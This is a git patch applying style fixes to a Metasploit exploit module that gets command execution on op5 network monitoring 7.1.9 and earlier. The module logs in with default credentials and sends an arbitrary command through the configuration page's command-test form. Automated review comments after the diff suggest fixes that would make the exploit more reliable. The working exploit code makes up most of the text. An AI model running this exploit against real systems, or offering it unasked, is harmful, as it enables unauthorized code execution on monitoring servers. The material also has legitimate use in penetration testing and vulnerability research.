From c2699ef194fbad04b2361ebc41d63bc6f63f83e1 Mon Sep 17 00:00:00 2001
From: h00die
Date: Fri, 3 Jun 2016 17:43:11 -0400
Subject: [PATCH] rubocop fixes
---
.../exploits/linux/http/op5_config_exec.rb | 101 +++++++++---------
1 file changed, 52 insertions(+), 49 deletions(-)
diff --git a/modules/exploits/linux/http/op5_config_exec.rb b/modules/exploits/linux/http/op5_config_exec.rb
index 2ca4620a44..88b4a1f988 100644
--- a/modules/exploits/linux/http/op5_config_exec.rb
+++ b/modules/exploits/linux/http/op5_config_exec.rb
@@ -6,65 +6,68 @@ require 'msf/core' class MetasploitModule < Msf::Exploit::Remote - include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) - super(update_info(info, - 'Name' => 'op5 v7.1.9 Configuration Command Execution', - 'Description' => %q{ - op5 an open source network monitoring software. - The configuration page in version 7.1.9 and below - allows the ability to test a system command, which - can be abused to run arbitrary code as an unpriv user. - }, - 'Author' => - [ - 'h00die ', # module - 'hyp3rlinx' # discovery - ], - 'References' => - [ - [ 'URL', 'https://www.exploit-db.com/exploits/39676/' ], - [ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/'] - ], - 'License' => MSF_LICENSE, - 'Platform' => ['linux', 'unix'], - 'Privileged' => false, - 'DefaultOptions' => { 'SSL' => true }, - 'Targets' => - [ - [ 'Automatic Target', { }] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Apr 08 2016', - )) + super( + update_info( + info, + 'Name' => 'op5 v7.1.9 Configuration Command Execution', + 'Description' => %q( + op5 an open source network monitoring software. + The configuration page in version 7.1.9 and below + allows the ability to test a system command, which + can be abused to run arbitrary code as an unpriv user. 
+ ), + 'Author' => + [ + 'h00die ', # module + 'hyp3rlinx' # discovery + ], + 'References' => + [ + [ 'EDB', '39676' ], + [ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/'] + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux', 'unix'], + 'Privileged' => false, + 'DefaultOptions' => { 'SSL' => true }, + 'Targets' => + [ + [ 'Automatic Target', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 08 2016' + ) + ) register_options( [ Opt::RPORT(443), OptString.new('USERNAME', [ true, 'User to login with', 'monitor']), OptString.new('PASSWORD', [ false, 'Password to login with', 'monitor']), - OptString.new('TARGETURI', [ true, 'The path to the application', '/']), - ], self.class) + OptString.new('TARGETURI', [ true, 'The path to the application', '/']) + ], self.class + ) end - def check() + def check begin - res = send_request_cgi({ + res = send_request_cgi( 'uri' => datastore['TARGETURI'], - 'method' => 'GET', - }) + 'method' => 'GET' + ) fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? /Version: (?[\d]{1,2})\.(?[\d]{1,2})\.(?[\d]{1,2})[\s]+\|/ =~ res.body - if version_high && version_med && version_low &&\ - version_high.to_i <= 7 &&\ - version_med.to_i <= 1 &&\ + if version_high && version_med && version_low && \ + version_high.to_i <= 7 && \ + version_med.to_i <= 1 && \ version_low.to_i <= 9 - vprint_good("Version Detected: #{[version_high, version_med, version_low].join(".")}") - Exploit::CheckCode::Vulnerable + vprint_good("Version Detected: #{[version_high, version_med, version_low].join('.')}") + Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end @@ -76,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit execute_cmdstager( :flavor => :echo, - :nodelete => true, + :nodelete => true ) end 
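Review bot: The version test in `check` compares the three components independently (`version_high.to_i <= 7 && version_med.to_i <= 1 && version_low.to_i <= 9`), so a release below 7.1.9 such as 6.5.0 or 7.0.12 falls through to `CheckCode::Safe`. That false negative matters more now that the positive result is only `Appears`. Comparing the whole version avoids it, e.g. `Gem::Version.new([version_high, version_med, version_low].join('.')) <= Gem::Version.new('7.1.9')`. The `begin` opened in `check` is closed outside this hunk, so the rescue path is not visible here.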
@@ -85,21 +88,21 @@ class MetasploitModule < Msf::Exploit::Remote # To manually view the vuln page, click Manage > Configure > Commands. # Click the "Test this command" button to display the form we abuse. - #login + # login login_data = 'csrf_token=' login_data << "&username=#{datastore['USERNAME']}" login_data << "&password=#{datastore['PASSWORD']}" - res = send_request_cgi({ + res = send_request_cgi( 'uri' => "#{datastore['TARGETURI']}monitor/index.php/auth/login?uri=tac%2Findex", 'method' => 'POST', 'data' => login_data - }) + ) fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 302 cookie = res.get_cookies - #exploit - res = send_request_cgi({ + # exploit + res = send_request_cgi( 'uri' => "/monitor/op5/nacoma/command_test.php", 'method' => 'GET', 'cookie' => cookie, @@ -107,9 +110,9 @@ class MetasploitModule < Msf::Exploit::Remote { 'cmd_str' => cmd } - }) + ) - #success means we hang our session, and wont get back a response + # success means we hang our session, and wont get back a response if res fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Credentials need additional privileges") if res.body =~ /Access Denied/
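Review bot: The login response is dereferenced without a nil check in `fail_with(...) if res.code != 302`, so a timeout or dropped connection raises NoMethodError instead of a clean failure. Guard it first, e.g. `fail_with(Failure::Unreachable, "#{peer} - No response to login request") unless res`. The second request also hardcodes `'/monitor/op5/nacoma/command_test.php'` while the login path is built from `datastore['TARGETURI']`; building both with `normalize_uri(target_uri.path, ...)` would keep them consistent when the application is not at `/`. The enclosing method starts above this hunk and continues past it.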
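Review bot: The line `fail_with(Failure::UnexpectedReply, "... no response") if res.nil?` sits inside `if res`, so it can never fire and the "no response" message is unreachable. The comment above says a successful run returns no response at all, so either drop that line or replace it with a comment such as `# a nil response is the expected success case; only inspect res when the server answered`. The `if res` block closes outside the hunk, so any later handling is not visible here.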